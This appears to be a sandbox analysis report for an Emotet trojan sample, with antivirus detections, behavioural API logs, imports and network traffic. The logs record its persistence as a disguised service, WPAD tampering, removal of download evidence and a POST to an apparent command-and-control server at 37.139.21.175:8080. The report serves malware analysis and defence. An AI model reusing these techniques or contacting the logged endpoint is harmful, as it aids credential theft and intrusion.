11.2
0-day
54 个模型检测该样本为恶意!
重新分析
更多

7d1453decfb8b19d8b94d1a7ef06c16c19068cb0479de0fe411c8245956df144

4987e659098247cfb2030c7f9eca042f.exe

分析耗时

407s

最近分析

文件大小

688.0KB
静态报毒 动态报毒 AI SCORE=86 ATTRIBUTE CLOUD DOWNLOADER34 ELDORADO EMOTET EPAZ GDSDA GENCIRC GENERICKD GENKRYPTIK HFFH HIGH CONFIDENCE HIGHCONFIDENCE HPCETK KRYPTIK R023C0DGV20 R346194 RQW@AU0LJVHJ SCORE SUSGEN TCNUA TROJANBANKER UNSAFE ZEXAF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Baidu 20190318 1.0.0.2
Alibaba Trojan:Win32/Emotet.afaf4cde 20190527 0.3.0.5
Avast Win32:Malware-gen 20200807 18.4.3895.0
Tencent Malware.Win32.Gencirc.11aaec2d 20200807 1.0.0.1
Kingsoft 20200807 2013.8.14.323
McAfee Emotet-FRI!4987E6590982 20200807 6.0.6.653
CrowdStrike 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619504852.321626
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (4 个事件)
Time & API Arguments Status Return Repeated
1619504836.383626
CryptGenKey
crypto_handle: 0x00903488
algorithm_identifier: 0x0000660e ()
provider_handle: 0x009060d0
flags: 1
key: f »á¹ŒòG’9%¡uö
success 1 0
1619504852.430626
CryptExportKey
crypto_handle: 0x00903488
crypto_export_handle: 0x00906090
buffer: f¤S½¦„°Ú„è×<¬Ë8zÒ@\2§iÛsL=QñŒ‚4…÷2“A§™„¥]!³’øÈdyÏg.opzˆ^{Éÿ¡ÑAù½WÉõ¡ƒªÜ‡ûϯêU+òkb!. -œÃ±°
blob_type: 1
flags: 64
success 1 0
1619504880.727626
CryptExportKey
crypto_handle: 0x00903488
crypto_export_handle: 0x00906090
buffer: f¤  %Vlä¦@¥‡>k¯¿}˦uÞÄLUtœ#»ÚÐ| ›]§­˜êfÊs.N’pRZqd¿@Ñئb1<ò ¸ÒóšŸT±?ÿ—ACâ¾7¹•' H­wKãgPō
blob_type: 1
flags: 64
success 1 0
1619504904.180626
CryptExportKey
crypto_handle: 0x00903488
crypto_export_handle: 0x00906090
buffer: f¤.òl8q¥bƒ\?¤+ är¤eÐ8ü1ZXB;sÇØÉ"_ÎÖÑòjŸžp¶†Ž{œCÀD²¯¢¾‚ÛÌH–Ö{p²yp¬Íͪø˜ì{d:úªàix
blob_type: 1
flags: 64
success 1 0
This executable has a PDB path (1 个事件)
pdb_path c:\Users\User\Desktop\2005\27.7.20\custom_pattern_brush_src\BrushTool\Release\BrushTool.pdb
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features Connection to IP address suspicious_request POST http://37.139.21.175:8080/j0V7918dVGr/1ZnCAPwRCvZBO8GR4I/
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:3083088768&cup2hreq=f594a9071d412ebaf31f75b70ad1bd2cc7a0855e87e8268366c7a8343fa3d60a
Performs some HTTP requests (5 个事件)
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619473948&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=d87c982ac53262f7&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619473948&mv=m
request POST http://37.139.21.175:8080/j0V7918dVGr/1ZnCAPwRCvZBO8GR4I/
request POST https://update.googleapis.com/service/update2?cup2key=10:3083088768&cup2hreq=f594a9071d412ebaf31f75b70ad1bd2cc7a0855e87e8268366c7a8343fa3d60a
Sends data using the HTTP POST Method (2 个事件)
request POST http://37.139.21.175:8080/j0V7918dVGr/1ZnCAPwRCvZBO8GR4I/
request POST https://update.googleapis.com/service/update2?cup2key=10:3083088768&cup2hreq=f594a9071d412ebaf31f75b70ad1bd2cc7a0855e87e8268366c7a8343fa3d60a
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619504825.025249
NtAllocateVirtualMemory
process_identifier: 2060
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00500000
success 0 0
1619504855.305876
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000004130000
success 0 0
1619504835.383626
NtAllocateVirtualMemory
process_identifier: 2984
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00890000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Foreign language identified in PE resource (3 个事件)
name RT_ICON language LANG_CHINESE offset 0x000ad3bc filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000128
name RT_ICON language LANG_CHINESE offset 0x000ad3bc filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000128
name RT_GROUP_ICON language LANG_CHINESE offset 0x000af34c filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000022
Drops a binary and executes it (1 个事件)
file C:\Windows\SysWOW64\NlsLexicons0047\TapiUnattend.exe
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619504827.822249
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\4987e659098247cfb2030c7f9eca042f.exe
newfilepath: C:\Windows\SysWOW64\NlsLexicons0047\TapiUnattend.exe
newfilepath_r: C:\Windows\SysWOW64\NlsLexicons0047\TapiUnattend.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\4987e659098247cfb2030c7f9eca042f.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619504854.852626
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 7.3267114730937415 section {'size_of_data': '0x0000c000', 'virtual_address': '0x00098000', 'entropy': 7.3267114730937415, 'name': '.data', 'virtual_size': '0x0000f708'} description A section with a high entropy has been found
Expresses interest in specific running processes (1 个事件)
process tapiunattend.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619504853.211626
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (4 个事件)
host 172.217.24.14
host 212.51.142.238
host 24.234.133.205
host 37.139.21.175
Installs itself for autorun at Windows startup (1 个事件)
service_name TapiUnattend service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\NlsLexicons0047\TapiUnattend.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619504830.572249
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x02aaaf40
display_name: TapiUnattend
error_control: 0
service_name: TapiUnattend
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\NlsLexicons0047\TapiUnattend.exe"
filepath_r: "C:\Windows\SysWOW64\NlsLexicons0047\TapiUnattend.exe"
service_manager_handle: 0x02aaa9a0
desired_access: 2
service_type: 16
password:
success 44740416 0
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619504857.446626
RegSetValueExA
key_handle: 0x000003bc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619504857.446626
RegSetValueExA
key_handle: 0x000003bc
value: `pz;×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619504857.446626
RegSetValueExA
key_handle: 0x000003bc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619504857.446626
RegSetValueExW
key_handle: 0x000003bc
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619504857.446626
RegSetValueExA
key_handle: 0x000003d4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619504857.446626
RegSetValueExA
key_handle: 0x000003d4
value: `pz;×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619504857.446626
RegSetValueExA
key_handle: 0x000003d4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619504857.461626
RegSetValueExW
key_handle: 0x000003b8
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\NlsLexicons0047\TapiUnattend.exe:Zone.Identifier
File has been identified by 54 AntiVirus engines on VirusTotal as malicious (50 out of 54 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.34255887
FireEye Generic.mg.4987e659098247cf
ALYac Trojan.GenericKD.34255887
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
AegisLab Trojan.Win32.Emotet.L!c
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
BitDefender Trojan.GenericKD.34255887
K7GW Riskware ( 0040eff71 )
Cybereason malicious.f4a765
Invincea heuristic
BitDefenderTheta Gen:NN.ZexaF.34152.RqW@au0ljVhj
Cyren W32/Kryptik.BRS.gen!Eldorado
Symantec ML.Attribute.HighConfidence
TrendMicro-HouseCall TROJ_GEN.R023C0DGV20
Paloalto generic.ml
Kaspersky HEUR:Trojan-Banker.Win32.Emotet.gen
Alibaba Trojan:Win32/Emotet.afaf4cde
NANO-Antivirus Trojan.Win32.Emotet.hpcetk
ViRobot Trojan.Win32.Z.Genkryptik.704512.AA
Avast Win32:Malware-gen
Tencent Malware.Win32.Gencirc.11aaec2d
Ad-Aware Trojan.GenericKD.34255887
Sophos Troj/Emotet-CKI
F-Secure Trojan.TR/Kryptik.tcnua
DrWeb Trojan.DownLoader34.9048
Zillya Trojan.Emotet.Win32.23028
TrendMicro TROJ_GEN.R023C0DGV20
Emsisoft Trojan.Emotet (A)
APEX Malicious
F-Prot W32/Kryptik.BRS.gen!Eldorado
Jiangmin Trojan.Banker.Emotet.nzo
Avira TR/Kryptik.tcnua
Antiy-AVL Trojan[Banker]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARJ!MTB
Arcabit Trojan.Generic.D20AB40F
ZoneAlarm HEUR:Trojan-Banker.Win32.Emotet.gen
GData Trojan.GenericKD.34255887
Cynet Malicious (score: 85)
AhnLab-V3 Trojan/Win32.Emotet.R346194
McAfee Emotet-FRI!4987E6590982
MAX malware (ai score=86)
VBA32 TrojanBanker.Emotet
Malwarebytes Trojan.MalPack.TRE
ESET-NOD32 a variant of Win32/Kryptik.HFFH
Rising Trojan.Kryptik!1.C983 (CLOUD)
Ikarus Trojan-Banker.Emotet
MaxSecure Trojan.Malware.11417434.susgen
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (5 个事件)
dead_host 172.217.24.14:443
dead_host 216.58.200.238:443
dead_host 24.234.133.205:80
dead_host 212.51.142.238:8080
dead_host 172.217.160.78:443
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-07-28 05:25:22

Imports

Library KERNEL32.dll:
0x47a1ac SetFileTime
0x47a1b0 SetFileAttributesA
0x47a1b4 GetFileAttributesA
0x47a1b8 GetFileTime
0x47a1bc SetErrorMode
0x47a1c0 GetTickCount
0x47a1c4 RtlUnwind
0x47a1c8 RaiseException
0x47a1cc HeapAlloc
0x47a1d0 HeapFree
0x47a1d4 HeapReAlloc
0x47a1d8 VirtualProtect
0x47a1dc VirtualAlloc
0x47a1e0 GetSystemInfo
0x47a1e4 VirtualQuery
0x47a1e8 GetCommandLineA
0x47a1ec GetProcessHeap
0x47a1f0 GetStartupInfoA
0x47a1f4 ExitThread
0x47a1f8 CreateThread
0x47a1fc HeapSize
0x47a200 TerminateProcess
0x47a20c IsDebuggerPresent
0x47a210 Sleep
0x47a214 GetACP
0x47a218 FatalAppExitA
0x47a21c VirtualFree
0x47a220 HeapDestroy
0x47a228 GetStdHandle
0x47a23c SetHandleCount
0x47a240 GetFileType
0x47a250 GetStringTypeA
0x47a254 GetStringTypeW
0x47a25c GetConsoleCP
0x47a260 GetConsoleMode
0x47a264 LCMapStringA
0x47a268 LCMapStringW
0x47a26c GetTimeFormatA
0x47a270 GetDateFormatA
0x47a274 GetUserDefaultLCID
0x47a278 EnumSystemLocalesA
0x47a27c IsValidLocale
0x47a280 IsValidCodePage
0x47a284 GetLocaleInfoW
0x47a288 SetStdHandle
0x47a28c WriteConsoleA
0x47a290 GetConsoleOutputCP
0x47a294 WriteConsoleW
0x47a2a8 GetAtomNameA
0x47a2ac GetOEMCP
0x47a2b0 GetCPInfo
0x47a2b4 CreateFileA
0x47a2b8 GetShortPathNameA
0x47a2bc GetFullPathNameA
0x47a2c4 FindFirstFileA
0x47a2c8 FindClose
0x47a2cc DuplicateHandle
0x47a2d0 GetThreadLocale
0x47a2d4 GetFileSize
0x47a2d8 SetEndOfFile
0x47a2dc UnlockFile
0x47a2e0 LockFile
0x47a2e4 FlushFileBuffers
0x47a2e8 SetFilePointer
0x47a2ec WriteFile
0x47a2f0 ReadFile
0x47a2f4 DeleteFileA
0x47a2f8 MoveFileA
0x47a300 TlsFree
0x47a308 LocalReAlloc
0x47a30c TlsSetValue
0x47a310 TlsAlloc
0x47a318 GlobalHandle
0x47a320 TlsGetValue
0x47a328 LocalAlloc
0x47a32c GlobalFlags
0x47a340 GlobalReAlloc
0x47a348 GetModuleFileNameW
0x47a34c CopyFileA
0x47a350 GlobalSize
0x47a354 FormatMessageA
0x47a358 LocalFree
0x47a35c MulDiv
0x47a360 GlobalGetAtomNameA
0x47a364 GlobalFindAtomA
0x47a368 lstrcmpW
0x47a36c GetVersionExA
0x47a370 GlobalUnlock
0x47a374 GlobalFree
0x47a378 FreeResource
0x47a37c GetCurrentProcessId
0x47a380 SetLastError
0x47a384 GlobalAddAtomA
0x47a388 CreateEventA
0x47a38c SuspendThread
0x47a390 SetEvent
0x47a394 WaitForSingleObject
0x47a398 ResumeThread
0x47a39c SetThreadPriority
0x47a3a0 CloseHandle
0x47a3a4 GetCurrentThread
0x47a3a8 GetCurrentThreadId
0x47a3b0 GetModuleFileNameA
0x47a3b8 GetLocaleInfoA
0x47a3bc GlobalLock
0x47a3c0 lstrcmpA
0x47a3c4 GlobalAlloc
0x47a3c8 GlobalDeleteAtom
0x47a3cc GetModuleHandleA
0x47a3d0 GetStringTypeExW
0x47a3d4 GetStringTypeExA
0x47a3e0 lstrlenA
0x47a3e4 lstrcmpiW
0x47a3e8 lstrcmpiA
0x47a3ec CompareStringW
0x47a3f0 CompareStringA
0x47a3f4 lstrlenW
0x47a3f8 GetVersion
0x47a3fc GetLastError
0x47a400 MultiByteToWideChar
0x47a404 InterlockedExchange
0x47a40c LoadLibraryA
0x47a410 FreeLibrary
0x47a414 lstrcatA
0x47a418 CreateProcessA
0x47a41c ExitProcess
0x47a420 LoadLibraryExA
0x47a424 GetProcAddress
0x47a428 GetCurrentProcess
0x47a42c WideCharToMultiByte
0x47a430 WinExec
0x47a434 FindResourceA
0x47a438 LoadResource
0x47a43c LockResource
0x47a440 HeapCreate
0x47a444 SizeofResource
Library USER32.dll:
0x47a524 IsRectEmpty
0x47a528 SetRect
0x47a52c InvalidateRgn
0x47a530 GetNextDlgGroupItem
0x47a534 UnregisterClassA
0x47a53c SetMenu
0x47a540 BringWindowToTop
0x47a544 CreatePopupMenu
0x47a548 InsertMenuItemA
0x47a54c LoadAcceleratorsA
0x47a550 LoadMenuA
0x47a554 ReuseDDElParam
0x47a558 UnpackDDElParam
0x47a560 GetKeyNameTextA
0x47a564 MapVirtualKeyA
0x47a568 SetParent
0x47a56c UnionRect
0x47a570 PostThreadMessageA
0x47a574 SetTimer
0x47a578 KillTimer
0x47a57c GetDCEx
0x47a580 LockWindowUpdate
0x47a584 ClientToScreen
0x47a588 GrayStringA
0x47a58c DrawTextExA
0x47a590 DrawTextA
0x47a594 TabbedTextOutA
0x47a598 FillRect
0x47a59c GetMenuStringA
0x47a5a0 InsertMenuA
0x47a5a4 RemoveMenu
0x47a5a8 ScrollWindowEx
0x47a5ac ShowWindow
0x47a5b0 MoveWindow
0x47a5b4 SetWindowTextA
0x47a5b8 IsDialogMessageA
0x47a5bc IsDlgButtonChecked
0x47a5c0 SetDlgItemTextA
0x47a5c4 SetDlgItemInt
0x47a5c8 GetDlgItemTextA
0x47a5cc GetDlgItemInt
0x47a5d0 CheckRadioButton
0x47a5d4 CheckDlgButton
0x47a5dc SendDlgItemMessageA
0x47a5e0 WinHelpA
0x47a5e4 IsChild
0x47a5e8 GetCapture
0x47a5ec GetClassLongA
0x47a5f0 GetClassNameA
0x47a5f4 SetPropA
0x47a5f8 GetPropA
0x47a5fc RemovePropA
0x47a600 SetFocus
0x47a608 GetWindowTextA
0x47a60c GetForegroundWindow
0x47a610 BeginDeferWindowPos
0x47a614 EndDeferWindowPos
0x47a618 UnhookWindowsHookEx
0x47a61c GetMessageTime
0x47a620 GetMessagePos
0x47a624 MapWindowPoints
0x47a628 ScrollWindow
0x47a62c TrackPopupMenuEx
0x47a630 CharNextA
0x47a634 SetScrollRange
0x47a638 GetScrollRange
0x47a63c SetScrollPos
0x47a640 GetScrollPos
0x47a644 SetForegroundWindow
0x47a648 ShowScrollBar
0x47a64c UpdateWindow
0x47a650 GetMenu
0x47a654 GetSubMenu
0x47a658 GetMenuItemID
0x47a65c GetMenuItemCount
0x47a660 CreateWindowExA
0x47a664 GetClassInfoExA
0x47a668 GetClassInfoA
0x47a66c RegisterClassA
0x47a670 AdjustWindowRectEx
0x47a674 ScreenToClient
0x47a678 EqualRect
0x47a67c DeferWindowPos
0x47a680 CopyRect
0x47a684 GetScrollInfo
0x47a688 SetScrollInfo
0x47a68c SetWindowPlacement
0x47a690 GetDlgCtrlID
0x47a694 DefWindowProcA
0x47a698 CallWindowProcA
0x47a69c OffsetRect
0x47a6a0 IntersectRect
0x47a6a8 GetWindowPlacement
0x47a6ac GetWindow
0x47a6b4 MapDialogRect
0x47a6b8 SetWindowPos
0x47a6bc GetDesktopWindow
0x47a6c0 SetActiveWindow
0x47a6c8 DestroyWindow
0x47a6cc GetDlgItem
0x47a6d0 GetNextDlgTabItem
0x47a6d4 EndDialog
0x47a6dc GetWindowLongA
0x47a6e0 GetLastActivePopup
0x47a6e4 IsWindowEnabled
0x47a6e8 MessageBoxA
0x47a6ec ShowOwnedPopups
0x47a6f0 SetWindowsHookExA
0x47a6f4 CallNextHookEx
0x47a6f8 PtInRect
0x47a6fc SetRectEmpty
0x47a700 DrawIcon
0x47a704 AppendMenuA
0x47a708 SendMessageA
0x47a70c GetSystemMenu
0x47a710 GetMessageA
0x47a714 TranslateMessage
0x47a718 DispatchMessageA
0x47a71c GetActiveWindow
0x47a720 IsWindowVisible
0x47a724 GetKeyState
0x47a728 PeekMessageA
0x47a72c GetCursorPos
0x47a730 ValidateRect
0x47a734 SetMenuItemBitmaps
0x47a73c LoadBitmapA
0x47a740 GetFocus
0x47a744 ModifyMenuA
0x47a748 GetDialogBaseUnits
0x47a74c DestroyIcon
0x47a750 GetSysColorBrush
0x47a754 WaitMessage
0x47a758 DeleteMenu
0x47a75c WindowFromPoint
0x47a760 DestroyMenu
0x47a764 GetMenuItemInfoA
0x47a768 EndPaint
0x47a76c BeginPaint
0x47a770 TrackPopupMenu
0x47a774 GetWindowDC
0x47a778 IsIconic
0x47a77c GetWindowRect
0x47a780 GetClientRect
0x47a784 InvalidateRect
0x47a788 OpenClipboard
0x47a78c EnableWindow
0x47a790 LoadIconA
0x47a794 GetSystemMetrics
0x47a798 CloseClipboard
0x47a79c SetClipboardData
0x47a7a0 SetCursor
0x47a7a4 InflateRect
0x47a7a8 GetDC
0x47a7ac ReleaseDC
0x47a7b0 RedrawWindow
0x47a7b4 SetCapture
0x47a7b8 GetParent
0x47a7bc MessageBeep
0x47a7c0 ReleaseCapture
0x47a7c4 IsWindow
0x47a7c8 GetSysColor
0x47a7cc DestroyCursor
0x47a7d0 SetWindowLongA
0x47a7d4 CopyIcon
0x47a7d8 LoadCursorA
0x47a7dc CharLowerA
0x47a7e0 CharLowerW
0x47a7e4 CharUpperA
0x47a7e8 CharUpperW
0x47a7ec PostQuitMessage
0x47a7f0 PostMessageA
0x47a7f4 CheckMenuItem
0x47a7f8 EnableMenuItem
0x47a7fc GetMenuState
0x47a800 GetTopWindow
Library GDI32.dll:
0x47a038 SetWindowOrgEx
0x47a03c OffsetWindowOrgEx
0x47a040 SetWindowExtEx
0x47a044 ScaleWindowExtEx
0x47a04c ArcTo
0x47a050 PolyDraw
0x47a054 PolylineTo
0x47a058 PolyBezierTo
0x47a05c ExtSelectClipRgn
0x47a060 DeleteDC
0x47a068 CreatePatternBrush
0x47a06c CreateCompatibleDC
0x47a070 SelectPalette
0x47a074 PlayMetaFileRecord
0x47a078 GetObjectType
0x47a07c EnumMetaFile
0x47a080 ScaleViewportExtEx
0x47a084 CreatePen
0x47a088 ExtCreatePen
0x47a08c CreateSolidBrush
0x47a090 CreateHatchBrush
0x47a098 SetRectRgn
0x47a09c CombineRgn
0x47a0a0 GetMapMode
0x47a0a4 PatBlt
0x47a0a8 DPtoLP
0x47a0ac GetTextMetricsA
0x47a0b0 GetBkColor
0x47a0b4 GetTextColor
0x47a0b8 GetRgnBox
0x47a0c0 GetCharWidthA
0x47a0c4 CreateFontA
0x47a0c8 StretchDIBits
0x47a0cc SetViewportExtEx
0x47a0d0 OffsetViewportOrgEx
0x47a0d4 SetViewportOrgEx
0x47a0d8 SelectObject
0x47a0dc Escape
0x47a0e0 ExtTextOutA
0x47a0e4 TextOutA
0x47a0e8 RectVisible
0x47a0ec PtVisible
0x47a0f0 StartDocA
0x47a0f4 GetPixel
0x47a0f8 BitBlt
0x47a0fc PlayMetaFile
0x47a100 CreateBrushIndirect
0x47a104 GetViewportExtEx
0x47a108 SelectClipPath
0x47a10c CreateRectRgn
0x47a110 GetClipRgn
0x47a114 SelectClipRgn
0x47a118 DeleteObject
0x47a11c SetColorAdjustment
0x47a120 SetArcDirection
0x47a124 SetMapperFlags
0x47a130 SetTextAlign
0x47a134 MoveToEx
0x47a138 LineTo
0x47a13c OffsetClipRgn
0x47a140 IntersectClipRect
0x47a144 ExcludeClipRect
0x47a148 SetMapMode
0x47a150 SetWorldTransform
0x47a154 SetGraphicsMode
0x47a158 SetStretchBltMode
0x47a15c SetROP2
0x47a160 SetPolyFillMode
0x47a164 SetBkMode
0x47a168 RestoreDC
0x47a16c SaveDC
0x47a170 CreateDCA
0x47a174 CopyMetaFileA
0x47a178 GetDeviceCaps
0x47a17c SetBkColor
0x47a180 SetTextColor
0x47a184 GetClipBox
0x47a188 GetDCOrgEx
0x47a190 GetObjectA
0x47a194 CreateFontIndirectA
0x47a198 GetStockObject
0x47a19c Rectangle
0x47a1a0 CreateBitmap
0x47a1a4 GetWindowExtEx
Library comdlg32.dll:
0x47a818 GetFileTitleA
Library WINSPOOL.DRV:
0x47a808 DocumentPropertiesA
0x47a80c OpenPrinterA
0x47a810 ClosePrinter
Library ADVAPI32.dll:
0x47a000 RegDeleteValueA
0x47a004 RegSetValueExA
0x47a008 RegCreateKeyExA
0x47a00c RegSetValueA
0x47a010 RegOpenKeyA
0x47a014 RegEnumKeyA
0x47a018 RegDeleteKeyA
0x47a01c RegQueryValueA
0x47a024 RegOpenKeyExA
0x47a028 RegQueryValueExA
0x47a02c RegCloseKey
0x47a030 RegCreateKeyA
Library SHELL32.dll:
0x47a4f0 ExtractIconA
0x47a4f4 SHGetFileInfoA
0x47a4f8 DragFinish
0x47a4fc DragQueryFileA
0x47a500 ShellExecuteA
Library SHLWAPI.dll:
0x47a50c PathFindFileNameA
0x47a510 PathStripToRootA
0x47a514 PathFindExtensionA
0x47a518 PathIsUNCA
Library oledlg.dll:
0x47a8a8
Library ole32.dll:
0x47a824 OleInitialize
0x47a82c OleUninitialize
0x47a830 OleRun
0x47a834 StringFromGUID2
0x47a838 CoCreateInstance
0x47a83c CoDisconnectObject
0x47a84c CoGetClassObject
0x47a850 OleDuplicateData
0x47a854 CoRevokeClassObject
0x47a858 ReleaseStgMedium
0x47a85c CreateBindCtx
0x47a860 CoTreatAsClass
0x47a864 StringFromCLSID
0x47a868 ReadClassStg
0x47a86c ReadFmtUserTypeStg
0x47a870 OleRegGetUserType
0x47a874 WriteClassStg
0x47a878 WriteFmtUserTypeStg
0x47a87c SetConvertStg
0x47a880 CoTaskMemFree
0x47a884 CLSIDFromString
0x47a888 CLSIDFromProgID
0x47a890 OleSetClipboard
0x47a894 OleFlushClipboard
0x47a89c CoTaskMemAlloc
Library OLEAUT32.dll:
0x47a44c SysAllocStringLen
0x47a450 VariantClear
0x47a454 VariantChangeType
0x47a458 VariantInit
0x47a45c SysStringLen
0x47a464 SysStringByteLen
0x47a474 SafeArrayDestroy
0x47a478 SysAllocString
0x47a480 SafeArrayAccessData
0x47a484 SafeArrayGetUBound
0x47a488 SafeArrayGetLBound
0x47a490 SafeArrayGetDim
0x47a494 SafeArrayCreate
0x47a498 SafeArrayRedim
0x47a49c VariantCopy
0x47a4a0 SafeArrayAllocData
0x47a4a8 SafeArrayCopy
0x47a4ac SafeArrayGetElement
0x47a4b0 SafeArrayPtrOfIndex
0x47a4b4 SafeArrayPutElement
0x47a4b8 SafeArrayLock
0x47a4bc SafeArrayUnlock
0x47a4c8 SysReAllocStringLen
0x47a4cc VarDateFromStr
0x47a4d0 VarBstrFromCy
0x47a4d4 VarBstrFromDec
0x47a4d8 VarDecFromStr
0x47a4dc VarCyFromStr
0x47a4e0 VarBstrFromDate
0x47a4e4 LoadTypeLib
0x47a4e8 SysFreeString

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49190 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49191 113.108.239.196 r3---sn-j5o7dn7e.gvt1.com 80
192.168.56.101 49189 203.208.41.97 redirector.gvt1.com 80
192.168.56.101 49186 203.208.41.98 update.googleapis.com 443
192.168.56.101 49193 37.139.21.175 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 50568 114.114.114.114 53
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 54991 114.114.114.114 53
192.168.56.101 55169 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
